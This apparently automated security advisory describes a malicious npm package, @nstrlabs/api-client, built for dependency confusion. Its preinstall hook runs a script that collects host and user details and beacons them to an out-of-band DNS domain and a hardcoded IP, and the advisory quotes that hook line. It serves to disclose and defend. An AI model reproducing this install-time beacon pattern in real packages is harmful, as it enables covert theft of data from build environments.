@nstrlabs/api-client @99.0.1

Summary

@nstrlabs/api-client@99.0.0 is a hollow package whose only behavior is an install-time exfiltration beacon. package.json declares "preinstall": "node index.js || true" , so every npm install automatically executes index.js, which collects os.hostname() , os.userInfo().username , __dirname , and process.cwd() and ships them through two independent channels: (1) a DNS lookup against a subdomain of d8jbmnsqcfu78dfs8vdg34ohqhirb4pbg.oast.live (OAST-style out-of-band callback) encoding the collected fields, and (2) an HTTP POST of the JSON payload to the hardcoded bare IP 172.201.213.59:9090/c . Errors are swallowed with || true to keep the install appearing successful. The package ships no API-client functionality; the version-bomb to 99.0.0 under the @nstrlabs scope, combined with the security research description and beacon-only payload, is the canonical dependency-confusion shape — designed to outrank a private internal @nstrlabs/api-client and silently identify hosts inside the target organization's build environment.

Source: amazon-inspector (de7b47a7f81209dbbaff286599b46f4f030ff992b6d0c25d947cc84739b838d9)